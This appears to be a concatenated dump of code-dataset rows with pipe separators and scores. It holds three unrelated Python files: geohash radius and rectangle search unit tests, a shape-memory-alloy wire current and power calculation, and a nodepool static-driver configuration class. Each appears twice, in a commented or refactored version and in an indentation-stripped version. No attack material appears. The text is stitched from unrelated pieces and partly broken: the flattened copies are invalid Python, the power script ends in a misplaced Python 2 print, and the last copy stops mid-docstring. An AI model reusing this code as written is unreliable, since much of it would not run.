        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1300, points)), 5)
        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1400, points)), 6)
        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1500, points)), 7)
        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 2100, points)), 8)
    def test_in_or_not_in_circle(self):
        # Both candidate points lie outside the 1000 m radius, so the
        # result must be empty.
        res = Search.search_points(Point("", 17.43215425542, 63.3124235462342), 1000,
                                   [Point("1", 17.42565123123, 63.325814352343),
                                    Point("2", 17.42565123123, 63.325814352343)])
        self.assertEqual(res, [])
    def test_with_distance_circle(self):
        # Results are PointWithDistance entries sorted by ascending
        # distance (in meters) from the query center.
        points_list = [Point("1.04", 49.98460165007597, -126.61710977554323),
                       Point("2.04", 49.97512724541457, -126.61693811416627),
                       Point("3.26", 49.96431118704076, -126.61401987075807),
                       Point("4.22", 49.9061784189361, -126.61363363265993),
                       Point("5.45", 49.86383118159863, -126.6121530532837),
                       Point("6.37", 49.86499305885544, -126.61258220672609),
                       Point("7.205", 49.857823724196905, -126.60713195800783)]
        res = Search.search_points(Point("", 49.86431118704076, -126.6171530532837), 5000, points_list)
        expected_list = [PointWithDistance(points_list[5], 336),
                         PointWithDistance(points_list[4], 362),
                         PointWithDistance(points_list[6], 1018),
                         PointWithDistance(points_list[3], 4662)]
        self.assertEqual(res, expected_list)
    def test_general_prefix_circle(self):
        # The common geohash prefix for a circular query must be a prefix
        # of the center point's own geohash, and it shortens (covers more
        # area) as the radius grows.
        point = Point("test_id", 19.97512724541457, 24.61693811416627)
        self.assertTrue(Search.general_prefix(Point("", 19.97512724541457, 24.61693811416627), 800) in point.geohash)
        self.assertEqual(Search.general_prefix(Point("", 49.98460165007597, -126.61710977554323), 500), "c0vuq")
        self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 800), "c0vu")
        self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 4000), "c0")
        self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 90000), "c")
        self.assertEqual(Search.general_prefix(Point("", 32.97512724541457, -57.61693811416627), 1000), "dtz5")
        self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 47.61693811416627), 5000), "v03")
        self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 63.61693811416627), 3000), "v2m")
    def test_general_prefix_rectangle(self):
        # The prefix length tracks the rectangle size: tiny rectangles get
        # long (precise) prefixes, larger ones get shorter prefixes.
        actual = Search.general_prefix_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
                                                  Point("bot_right", 59.68386129364914, -112.92572021484375)])
        self.assertEqual("c6xe", actual)
        actual = Search.general_prefix_rectangle([Point("top_left", 59.839295488500326, -112.89825439453125),
                                                  Point("bot_right", 59.78577919120723, -112.79525756835938)])
        self.assertEqual("c6x", actual)
        actual = Search.general_prefix_rectangle([Point("top_left", 60.2035192283986, -112.91772723197937),
                                                  Point("bot_right", 60.20343925759669, -112.91756093502045)])
        self.assertEqual("c6xwqrxy", actual)
        actual = Search.general_prefix_rectangle([Point("top_left", 60.13586367528046, -112.8738784790039),
                                                  Point("bot_right", 60.13458148138504, -112.87078857421875)])
        self.assertEqual("c6xwp", actual)
    def test_search_in_rectangle(self):
        # Only the five "in_rect*" points fall inside the rectangle.
        points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
                  Point("in_rect2", 59.692871645401674, -112.99198150634766),
                  Point("in_rect3", 59.697029451864545, -112.9669189453125),
                  Point("in_rect4", 59.71313607653958, -112.97309875488281),
                  Point("in_rect5", 59.72213855345352, -113.00537109375),
                  Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
                  Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
                  Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
                  Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
                  Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
        actual = len(Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
                                                     Point("bot_right", 59.68386129364914, -112.92572021484375)],
                                                    Point("cur_p", 59.70222598402985, -112.9562759399414), points))
        self.assertEqual(5, actual)
    def test_with_distance_rectangle(self):
        # Rectangle results are ordered by ascending distance (meters)
        # from the "cur_p" reference point, not by input order.
        points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
                  Point("in_rect2", 59.692871645401674, -112.99198150634766),
                  Point("in_rect3", 59.697029451864545, -112.9669189453125),
                  Point("in_rect4", 59.71313607653958, -112.97309875488281),
                  Point("in_rect5", 59.72213855345352, -113.00537109375),
                  Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
                  Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
                  Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
                  Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
                  Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
        actual = Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
                                                 Point("bot_right", 59.68386129364914, -112.92572021484375)],
                                                Point("cur_p", 59.70222598402985, -112.9562759399414), points)
        expected_list = [PointWithDistance(points[2], 830),
                         PointWithDistance(points[3], 1536),
                         PointWithDistance(points[1], 2257),
                         PointWithDistance(points[0], 2383),
                         PointWithDistance(points[4], 3533)]
        self.assertEqual(expected_list, actual)
if __name__ == '__main__':
unittest.main() | app/test/test_searcher.py | import unittest
from app.main.searcher import Search
from app.main.loc_types import Point, PointWithDistance
class TestSearcher(unittest.TestCase):
def test_on_empty_list_circle(self):
self.assertEqual(Search.search_points(Point("", 46.483264729155586, 30.731506347656254), 3, []), [])
def test_with_radius_increase_circle(self):
points = [Point("1.00", 49.86875093132386, -126.63013458251955),
Point("1.04", 49.86460165007597, -126.61710977554323),
Point("2.04", 49.86512724541457, -126.61693811416627),
Point("3.26", 49.86431118704076, -126.61401987075807),
Point("4.22", 49.8661784189361, -126.61363363265993),
Point("5.45", 49.86283118159863, -126.6121530532837),
Point("6.37", 49.86399305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 0, points)), 1)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1100, points)), 3)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1300, points)), 5)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1400, points)), 6)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1500, points)), 7)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 2100, points)), 8)
def test_in_or_not_in_circle(self):
res = Search.search_points(Point("", 17.43215425542, 63.3124235462342), 1000,
[Point("1", 17.42565123123, 63.325814352343),
Point("2", 17.42565123123, 63.325814352343)])
self.assertEqual(res, [])
def test_with_distance_circle(self):
points_list = [Point("1.04", 49.98460165007597, -126.61710977554323),
Point("2.04", 49.97512724541457, -126.61693811416627),
Point("3.26", 49.96431118704076, -126.61401987075807),
Point("4.22", 49.9061784189361, -126.61363363265993),
Point("5.45", 49.86383118159863, -126.6121530532837),
Point("6.37", 49.86499305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
res = Search.search_points(Point("", 49.86431118704076, -126.6171530532837), 5000, points_list)
expected_list = [PointWithDistance(points_list[5], 336),
PointWithDistance(points_list[4], 362),
PointWithDistance(points_list[6], 1018),
PointWithDistance(points_list[3], 4662)]
self.assertEqual(res, expected_list)
def test_general_prefix_circle(self):
point = Point("test_id", 19.97512724541457, 24.61693811416627)
self.assertTrue(Search.general_prefix(Point("", 19.97512724541457, 24.61693811416627), 800) in point.geohash)
self.assertEqual(Search.general_prefix(Point("", 49.98460165007597, -126.61710977554323), 500), "c0vuq")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 800), "c0vu")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 4000), "c0")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 90000), "c")
self.assertEqual(Search.general_prefix(Point("", 32.97512724541457, -57.61693811416627), 1000), "dtz5")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 47.61693811416627), 5000), "v03")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 63.61693811416627), 3000), "v2m")
def test_general_prefix_rectangle(self):
actual = Search.general_prefix_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)])
self.assertEqual("c6xe", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 59.839295488500326, -112.89825439453125),
Point("bot_right", 59.78577919120723, -112.79525756835938)])
self.assertEqual("c6x", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.2035192283986, -112.91772723197937),
Point("bot_right", 60.20343925759669, -112.91756093502045)])
self.assertEqual("c6xwqrxy", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.13586367528046, -112.8738784790039),
Point("bot_right", 60.13458148138504, -112.87078857421875)])
self.assertEqual("c6xwp", actual)
def test_search_in_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = len(Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points))
self.assertEqual(5, actual)
def test_with_distance_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points)
expected_list = [PointWithDistance(points[2], 830),
PointWithDistance(points[3], 1536),
PointWithDistance(points[1], 2257),
PointWithDistance(points[0], 2383),
PointWithDistance(points[4], 3533)]
self.assertEqual(expected_list, actual)
if __name__ == '__main__':
unittest.main() | 0.566858 | 0.479869 |
import math
import numpy as np
import matplotlib.pyplot as plt
def power(delta_t, sigma, T, xi, eps_s, L_s, output = "all"):
    """
    Calculate the electrical current, power and mechanical work needed to
    drive a shape-memory-alloy wire along the given state history.

    Parameters:
    - delta_t: time step between consecutive samples (s)
    - sigma:   stress history (Pa)
    - T:       temperature history (K)
    - xi:      martensitic volume-fraction history
    - eps_s:   strain history
    - L_s:     wire length history (m)
    - output: defines what is the function output ("power" -> total power
      only; "all" -> (I_list, P_list, W_list, Total_power))

    The per-interval lists are one element shorter than the inputs.
    Raises ValueError for an unrecognized ``output`` mode.
    """
    sigma_o = 100e6
    r = 0.00025     # wire radius (m); d below is the cylinder diameter
    d = 2*r
    T_o = 200.      # ambient temperature (K)
    alpha = 0. #set to zero on purpose
    c = 837.36 #invented
    rho = 6450.     # wire material density (kg/m^3)
    #Transformation strain properties
    H_max = 0.1209
    H_min = 0.0924
    sigma_crit = 0
    k = 5.9713e-09
    rho_E_M = 0.8e-6 #Dynalloy
    rho_E_A = 1.0e-6 #Dynalloy
    E_A = 2.1496e+10
    E_M = 3.3453e+10
    C_A = 8.0370e+06
    C_M = 7.1233e+06
    M_s = 362.5851
    M_f = 297.4771
    A_s = 318.3625
    A_f = 386.8458
    n1 = 0.1919
    n2 = 0.1823
    n3 = 0.1623
    n4 = 0.2188
    sigma_cal = 200E6
    #==============================================================================
    # # Heat Transfer parameters
    #==============================================================================
    # Gravity:
    g = 9.8 #ms-2
    # Atmospheric pressure
    P_air = 101325. # Pa
    # Molar mass of air
    M = 0.0289644 #kg/mol
    # Ideal gas constant
    R = 8.31447 #J/(mol K)
    # Air density:
    rho_air = P_air*M / (R*T_o)
    # Sutherland's law coefficients
    C1 = 1.458e-6 #kg/m.s.sqrt(K)
    C2 = 110.4 #K
    # Air dynamic viscosity:
    mu_air = (C1 * T_o**(3./2)) / (T_o+C2)
    # Air kinematic viscosity:
    nu_air = mu_air/rho_air
    # Air specific heat at constant pressure
    Cp_air = 1.005
    # Air conductivity
    k_air = 0.0264
    # Nusselt number coefficients
    alpha_1 = 1.
    alpha_2 = 0.287
    #==============================================================================
    # Calculate Power and current
    #==============================================================================
    I_list = []
    P_list = []
    W_list = []
    # Loop-invariant quantities, hoisted out of the per-sample loop
    # (expressions unchanged; none of them depend on the loop index).
    # Prandtl number definition
    Pr = mu_air*Cp_air/k_air
    # Transformation strain at the fixed stresses sigma_o / sigma_cal.
    H_cur = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_o) - sigma_crit)))
    H_cur_cal = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_cal) - sigma_crit)))
    n = len(eps_s)
    for i in range(1, n):
        delta_sigma = sigma[i] - sigma[i-1]
        delta_T = T[i] - T[i-1]
        delta_eps = eps_s[i] - eps_s[i-1]
        delta_xi = xi[i] - xi[i-1]
        # Grashof number for external flow around a cylinder
        Gr = 2*abs(T[i] - T_o)/(T[i] + T_o)*(g*d**3)/(nu_air**2)
        # Nusselt number and parameter
        Nu = (alpha_1 + alpha_2*(Gr*Pr/(1 + (0.56/Pr)**(9./16))**(16./9))**(1./6))**2
        # Calculate convection coefficient h from definition of Nusselt number
        h = k_air*Nu/d
        # Electrical resistivity: phase mixture weighted by xi.
        rho_E = rho_E_M*xi[i] + (1-xi[i])*rho_E_A
        # Stress derivative of the transformation-strain expression.
        if abs(sigma[i]) <= sigma_crit:
            dH_cur = 0
        else:
            dH_cur = k*(H_max-H_min)*math.exp(-k*(abs(sigma[i])-sigma_crit))*np.sign(sigma[i])
        rho_delta_s0 = (-2*(C_M*C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/(C_M + C_A)
        a1 = rho_delta_s0*(M_f - M_s)
        a2 = rho_delta_s0*(A_s - A_f)
        a3 = -a1/4 * (1 + 1/(n1+1) - 1/(n2+1)) + a2/4 * (1+1/(n3+1) - 1/(n4+1))
        Y_0_t = rho_delta_s0/2*(M_s - A_f) - a3
        D = ((C_M - C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/((C_M + C_A)*(H_cur_cal+ sigma_cal*dH_cur))
        pi_t = Y_0_t + D*abs(sigma[i])*H_cur
        #constant h
        I = r*math.pi*math.sqrt((r/rho_E)*((r/delta_t)*((T[i]*alpha*delta_sigma + \
            rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) ) + \
            2.*h*(T[i] - T_o))))
        P = math.pi*r**2*L_s[i]*((T[i]*alpha*delta_sigma + \
            rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) )/delta_t + \
            2.*(h/r)*(T[i] - T_o))
        dW = math.pi*r**2*L_s[0]*0.5*(sigma[i]+sigma[i-1])*delta_eps
        I_list.append(I)
        P_list.append(P)
        W_list.append(dW)
    # Integrate instantaneous power over time (trapezoidal rule).
    Total_power = 0
    for i in range(len(P_list)-1):
        Total_power += delta_t*(P_list[i] + P_list[i+1])/2.
    if output == 'all':
        return I_list, P_list, W_list, Total_power
    elif output == "power":
        return Total_power
    else:
        # The original silently returned None here; fail loudly instead.
        raise ValueError("unknown output mode: {!r}".format(output))
if __name__ == '__main__':
    import pickle
    # Load the pickled simulation history. Use a context manager so the
    # file handle is closed even if unpickling fails (the original left
    # the handle open).
    with open("data.p", "rb") as data_file:
        Data = pickle.load(data_file)
    sigma = Data['sigma']
    T = Data['T']
    xi = Data['xi']
    eps_s = Data['eps_s']
    L_s = Data['L_s']
    #Time step
    delta_t = 0.05
    I, P, W, Total_power = power(delta_t, sigma, T, xi, eps_s, L_s, output = "all")
    # The lists returned by power() describe the n-1 intervals between
    # the n input samples, hence the shorter time axis.
    n = len(eps_s)
    t = np.linspace(0,(n-2)*delta_t, n-1)
    # Current vs. time
    plt.figure()
    plt.plot(t, I, 'b')
    plt.scatter(t, I, c = 'b')
    plt.xlabel('Time (s)')
    plt.ylabel('Current (A)')
    plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
              min(I) - 0.02*(max(I)-min(I)),
              max(I) + 0.02*(max(I)-min(I))])
    plt.grid()
    # Power vs. time
    plt.figure()
    plt.plot(t, P, 'b')
    plt.scatter(t, P, c = 'b')
    plt.xlabel('Time (s)')
    plt.ylabel('Power (W)')
    plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
              min(P) - 0.02*(max(P)-min(P)),
              max(P) + 0.02*(max(P)-min(P))])
    plt.grid()
print 'Total power is %f Joules' % Total_power | dynamic_model/power_usage.py | import math
import numpy as np
import matplotlib.pyplot as plt
def power(delta_t, sigma, T, xi, eps_s, L_s, output = "all"):
"""
Calculate work, power and current.
- output: defines what is the function output (Power or all)
"""
sigma_o = 100e6
r = 0.00025
d = 2*r
T_o = 200.
alpha = 0. #set to zero on purpose
c = 837.36 #invented
rho = 6450.
#Transformation strain properties
H_max = 0.1209
H_min = 0.0924
sigma_crit = 0
k = 5.9713e-09
rho_E_M = 0.8e-6 #Dynalloy
rho_E_A = 1.0e-6 #Dynalloy
E_A = 2.1496e+10
E_M = 3.3453e+10
C_A = 8.0370e+06
C_M = 7.1233e+06
M_s = 362.5851
M_f = 297.4771
A_s = 318.3625
A_f = 386.8458
n1 = 0.1919
n2 = 0.1823
n3 = 0.1623
n4 = 0.2188
sigma_cal = 200E6
#==============================================================================
# # Heat Transfer parameters
#==============================================================================
# Gravity:
g = 9.8 #ms-2
# Atmospheric pressure
P_air = 101325. # Pa
# Molar
M = 0.0289644 #kg/mol
# Ideal gas constant
R = 8.31447 #J/(mol K)
# Air density:
rho_air = P_air*M / (R*T_o)
# Sutherland's law coefficients
C1 = 1.458e-6 #kg/m.s.sqrt(K)
C2 = 110.4 #K
# Air dynamic viscosity:
mu_air = (C1 * T_o**(3./2)) / (T_o+C2)
# Air kinematic viscosity:
nu_air = mu_air/rho_air
# Air specific heat at constant pressure
Cp_air = 1.005
# Air conductivity
k_air = 0.0264
# Nusselt number coefficients
alpha_1 = 1.
alpha_2 = 0.287
#==============================================================================
# Calculate Power and current
#==============================================================================
I_list = []
P_list = []
W_list = []
n = len(eps_s)
for i in range(1, n):
delta_sigma = sigma[i] - sigma[i-1]
delta_T = T[i] - T[i-1]
delta_eps = eps_s[i] - eps_s[i-1]
delta_xi = xi[i] - xi[i-1]
# Grashof number for external flow around a cylinder
Gr = 2*abs(T[i] - T_o)/(T[i] + T_o)*(g*d**3)/(nu_air**2)
# Prandtl number definition
Pr = mu_air*Cp_air/k_air
# Nusselt number and parameter
Nu = (alpha_1 + alpha_2*(Gr*Pr/(1 + (0.56/Pr)**(9./16))**(16./9))**(1./6))**2
# Calculate convection coefficient h from definition of Nusselt number
h = k_air*Nu/d
rho_E = rho_E_M*xi[i] + (1-xi[i])*rho_E_A
if abs(sigma[i]) <= sigma_crit:
dH_cur = 0
else:
dH_cur = k*(H_max-H_min)*math.exp(-k*(abs(sigma[i])-sigma_crit))*np.sign(sigma[i])
H_cur = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_o) - sigma_crit)))
H_cur_cal = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_cal) - sigma_crit)))
rho_delta_s0 = (-2*(C_M*C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/(C_M + C_A)
a1 = rho_delta_s0*(M_f - M_s)
a2 = rho_delta_s0*(A_s - A_f)
a3 = -a1/4 * (1 + 1/(n1+1) - 1/(n2+1)) + a2/4 * (1+1/(n3+1) - 1/(n4+1))
Y_0_t = rho_delta_s0/2*(M_s - A_f) - a3
D = ((C_M - C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/((C_M + C_A)*(H_cur_cal+ sigma_cal*dH_cur))
pi_t = Y_0_t + D*abs(sigma[i])*H_cur
#constant h
I = r*math.pi*math.sqrt((r/rho_E)*((r/delta_t)*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) ) + \
2.*h*(T[i] - T_o))))
P = math.pi*r**2*L_s[i]*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) )/delta_t + \
2.*(h/r)*(T[i] - T_o))
dW = math.pi*r**2*L_s[0]*0.5*(sigma[i]+sigma[i-1])*delta_eps
I_list.append(I)
P_list.append(P)
W_list.append(dW)
Total_power = 0
for i in range(len(P_list)-1):
Total_power += delta_t*(P_list[i] + P_list[i+1])/2.
if output == 'all':
return I_list, P_list, W_list, Total_power
elif output == "power":
return Total_power
if __name__ == '__main__':
import pickle
#Load data
Data = pickle.load(open( "data.p", "rb" ))
sigma = Data['sigma']
T = Data['T']
xi = Data['xi']
eps_s = Data['eps_s']
L_s = Data['L_s']
#Time step
delta_t = 0.05
I, P, W, Total_power = power(delta_t, sigma, T, xi, eps_s, L_s, output = "all")
n = len(eps_s)
t = np.linspace(0,(n-2)*delta_t, n-1)
plt.figure()
plt.plot(t, I, 'b')
plt.scatter(t, I, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Current (A)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(I) - 0.02*(max(I)-min(I)),
max(I) + 0.02*(max(I)-min(I))])
plt.grid()
plt.figure()
plt.plot(t, P, 'b')
plt.scatter(t, P, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Power (W)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(P) - 0.02*(max(P)-min(P)),
max(P) + 0.02*(max(P)-min(P))])
plt.grid()
print 'Total power is %f Joules' % Total_power | 0.439386 | 0.524456 |
import voluptuous as v
from nodepool.driver import ConfigPool
from nodepool.driver import ProviderConfig
from nodepool.config import as_list
class StaticPool(ConfigPool):
    """Configuration for one pool of pre-declared ("static") nodes.

    The nodes are listed directly in the config file; loading a pool
    records each node's connection settings and registers the pool under
    every label its nodes provide.
    """

    def __init__(self):
        self.name = None
        self.nodes = []
        # The StaticProviderConfig that owns this pool.
        self.provider = None
        # Initialize base class attributes
        super().__init__()

    def __eq__(self, other):
        if isinstance(other, StaticPool):
            return (super().__eq__(other) and
                    other.name == self.name and
                    other.nodes == self.nodes)
        return False

    def __repr__(self):
        return "<StaticPool %s>" % self.name

    def load(self, pool_config, full_config):
        """Populate this pool from its parsed ``pool_config`` section and
        register the pool on every label it serves in ``full_config``."""
        super().load(pool_config)
        self.name = pool_config['name']
        # WARNING: This intentionally changes the type!
        self.labels = set()
        for node in pool_config.get('nodes', []):
            self.nodes.append({
                'name': node['name'],
                'labels': as_list(node['labels']),
                'host-key': as_list(node.get('host-key', [])),
                'host-key-checking': bool(node.get('host-key-checking', True)),
                'timeout': int(node.get('timeout', 5)),
                # Read ssh-port values for backward compat, but prefer port
                'connection-port': int(
                    node.get('connection-port', node.get('ssh-port', 22))),
                'connection-type': node.get('connection-type', 'ssh'),
                'username': node.get('username', 'zuul'),
                'max-parallel-jobs': int(node.get('max-parallel-jobs', 1)),
                'python-path': node.get('python-path', '/usr/bin/python2'),
            })
            # Labels may be a whitespace-separated string or a list;
            # normalize once instead of duplicating the registration loop
            # per type (any other type is ignored, as before).
            labels = node['labels']
            if isinstance(labels, str):
                labels = labels.split()
            if isinstance(labels, list):
                for label in labels:
                    self.labels.add(label)
                    full_config.labels[label].pools.append(self)
class StaticProviderConfig(ProviderConfig):
    """Provider-level configuration for the static driver.

    Holds the provider's pools (pool name -> StaticPool) and the
    voluptuous schema used to validate the provider's config section.
    """
    def __init__(self, *args, **kwargs):
        # Private mapping of pool name -> StaticPool, exposed read-only
        # via the ``pools`` property.
        self.__pools = {}
        super().__init__(*args, **kwargs)
    def __eq__(self, other):
        if isinstance(other, StaticProviderConfig):
            return (super().__eq__(other) and
                    other.manage_images == self.manage_images and
                    other.pools == self.pools)
        return False
    @property
    def pools(self):
        return self.__pools
    @property
    def manage_images(self):
        # The static driver never builds or manages images (always False).
        return False
    def load(self, config):
        """Build a StaticPool for each configured pool and register it."""
        for pool in self.provider.get('pools', []):
            pp = StaticPool()
            pp.load(pool, config)
            pp.provider = self
            self.pools[pp.name] = pp
    def getSchema(self):
        """Return the voluptuous schema validating this provider section."""
        pool_node = {
            v.Required('name'): str,
            v.Required('labels'): v.Any(str, [str]),
            'username': str,
            'timeout': int,
            'host-key-checking': bool,
            'host-key': v.Any(str, [str]),
            'connection-port': int,
            'connection-type': str,
            'max-parallel-jobs': int,
            'python-path': str,
        }
        pool = ConfigPool.getCommonSchemaDict()
        pool.update({
            'name': str,
            'nodes': [pool_node],
        })
        schema = ProviderConfig.getCommonSchemaDict()
        schema.update({'pools': [pool]})
        return v.Schema(schema)
    def getSupportedLabels(self, pool_name=None):
        """Return the set of labels this provider serves; restrict to one
        pool when ``pool_name`` is given."""
        labels = set()
        for pool in self.pools.values():
            if not pool_name or (pool.name == pool_name):
                labels.update(pool.labels)
        return labels | nodepool/driver/static/config.py |
import voluptuous as v
from nodepool.driver import ConfigPool
from nodepool.driver import ProviderConfig
from nodepool.config import as_list
class StaticPool(ConfigPool):
    """Configuration for one pool of statically-defined (pre-existing) nodes."""

    def __init__(self):
        self.name = None
        # Plain dicts (one per configured host) built in load().
        self.nodes = []
        # The StaticProviderConfig that owns this pool.
        self.provider = None
        # Initialize base class attributes
        super().__init__()

    def __eq__(self, other):
        # Equal only to another StaticPool with equal base attributes,
        # name and node list.
        if isinstance(other, StaticPool):
            return (super().__eq__(other) and
                    other.name == self.name and
                    other.nodes == self.nodes)
        return False

    def __repr__(self):
        return "<StaticPool %s>" % self.name

    def load(self, pool_config, full_config):
        """Populate this pool from its raw config dict.

        :param pool_config: the parsed YAML dict for this pool.
        :param full_config: the whole nodepool config; this pool appends
            itself to full_config.labels[...] for every label it serves.
        """
        super().load(pool_config)
        self.name = pool_config['name']
        # WARNING: This intentionally changes the type!
        self.labels = set()
        for node in pool_config.get('nodes', []):
            # Normalize each node entry, filling in defaults.
            self.nodes.append({
                'name': node['name'],
                'labels': as_list(node['labels']),
                'host-key': as_list(node.get('host-key', [])),
                'host-key-checking': bool(node.get('host-key-checking', True)),
                'timeout': int(node.get('timeout', 5)),
                # Read ssh-port values for backward compat, but prefer port
                'connection-port': int(
                    node.get('connection-port', node.get('ssh-port', 22))),
                'connection-type': node.get('connection-type', 'ssh'),
                'username': node.get('username', 'zuul'),
                'max-parallel-jobs': int(node.get('max-parallel-jobs', 1)),
                'python-path': node.get('python-path', '/usr/bin/python2'),
            })
            # Register this pool under every label the node serves; a str
            # value is treated as a whitespace-separated list of labels.
            if isinstance(node['labels'], str):
                for label in node['labels'].split():
                    self.labels.add(label)
                    full_config.labels[label].pools.append(self)
            elif isinstance(node['labels'], list):
                for label in node['labels']:
                    self.labels.add(label)
                    full_config.labels[label].pools.append(self)
class StaticProviderConfig(ProviderConfig):
    """Provider configuration for the static node driver.

    Static providers manage a fixed inventory of pre-existing hosts, so
    no image building or uploading is required.
    """

    def __init__(self, *args, **kwargs):
        # Name-mangled so subclasses cannot accidentally clobber the map.
        self.__pools = {}
        super().__init__(*args, **kwargs)

    def __eq__(self, other):
        if isinstance(other, StaticProviderConfig):
            return (super().__eq__(other) and
                    other.manage_images == self.manage_images and
                    other.pools == self.pools)
        return False

    @property
    def pools(self):
        # Mapping of pool name -> StaticPool.
        return self.__pools

    @property
    def manage_images(self):
        # Static providers never build or upload images.
        return False

    def load(self, config):
        """Populate self.pools from the raw provider dict.

        :param config: the full parsed nodepool config; passed through to
            each pool so it can register itself under its labels.
        """
        for pool in self.provider.get('pools', []):
            pp = StaticPool()
            pp.load(pool, config)
            pp.provider = self
            self.pools[pp.name] = pp

    def getSchema(self):
        """Return the voluptuous schema validating this provider's config."""
        pool_node = {
            v.Required('name'): str,
            v.Required('labels'): v.Any(str, [str]),
            'username': str,
            'timeout': int,
            'host-key-checking': bool,
            'host-key': v.Any(str, [str]),
            'connection-port': int,
            'connection-type': str,
            'max-parallel-jobs': int,
            'python-path': str,
        }
        pool = ConfigPool.getCommonSchemaDict()
        pool.update({
            'name': str,
            'nodes': [pool_node],
        })
        schema = ProviderConfig.getCommonSchemaDict()
        schema.update({'pools': [pool]})
        return v.Schema(schema)

    def getSupportedLabels(self, pool_name=None):
        """Return the set of labels served by this provider.

